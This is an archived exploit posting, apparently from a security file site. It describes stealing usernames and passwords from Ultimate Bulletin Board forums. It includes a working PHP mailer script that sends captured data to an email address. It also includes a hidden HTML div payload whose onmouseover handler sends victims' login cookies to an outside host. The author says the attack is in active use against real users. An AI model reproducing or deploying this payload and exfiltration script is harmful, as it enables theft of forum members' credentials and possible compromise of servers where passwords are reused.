exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ultimate-bb.txt

ultimate-bb.txt
Posted Feb 16, 2001
Authored by Unregistered

The Ultimate Bulletin Board System allows remote users to get the username and pass of anyone that is a registered user of a ubb forum that has html enabled and uses cookies to store the username and passwords of the users.

tags | exploit, remote
SHA-256 | 9d5082efd21f409b5ad3daca83e818ef19b075ca500641904a82ae2d168d2cb3

ultimate-bb.txt

Change Mirror Download
<------explaination    -------->
I set up a script on some server somewhere that will mail me the contents of
"whatever" in a url query as such ->
http://somehost.com/somescript.php/cgi/pl/asp?contents="whatever"
when I have that script in place I post a message on the board that I wish
to steal peoples passes from with(for Internet Explorer, for Netscape use
the <layer> tag) a <div> tag in it that positions itself on a prominent part
of the page that is likely to have someone put their mouse over it. The
<div> tag has the "onmouseover" javascript event handler and calls for the
"getCookie('cookiename')" javascript function definded by the UBB output for
the "reply" page, and it adds the contents of the unfortuneate victims user
and pass cookies to the end of the link. This of course would then email
the user and pass to me whenever someone moved their mouse over the
invisible <div> area while on the reply page. NOTE: the script does nothing
but give a non-popup javascript error in the lower left of the browser
screen on the thread "view" page, so no one knows whats going on and it
looks like a normal thread.
<--------end explaination------------>
i have done this and it works, I am still recieving passwords in my mail
box.
<***************begin actual scripts***************>
this is the php script that i use to mail me the user/pass combos:
<---------begin php file-------------->
<?php
if ($contents && $header){
mail("xavic_doute@hotmail.com" , "from mail script",$contents,$header) or
die('couldnt email it');
sleep(2);
?>
<script language=javascript>
<!--
history.go(-1);
// -->
</script>
<?php
} else {
echo "nope";
}
?>
<--------------end php file----------->
this is what you need to include in the post on the board:
<-----------begin html+script--------->
<div
onmouseover='top.location.href="http://somehost.net/mail.php?header=from:victim@theboard.net&contents="+getCookie("UserName")+":"+getCookie("Password");'
position=absolute style="position:absolute;top:270px;left:0px;"><table
width=100% height=30 border=0><tr><td> </td></tr></table></div>
<-----------end html+script----------->
<***************end actual scripts***************>

if you publish this as some sort of exploit or something keep in mind that
even the mods and admin of the boards can have their passes stolen this way.
that means that if they use the same pass for the server then the servers
security can be compromised with this(alot of people use the same passes for
many things as im sure you know).

-Unregistered
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    21 Files
  • 27
    Aug 27th
    28 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close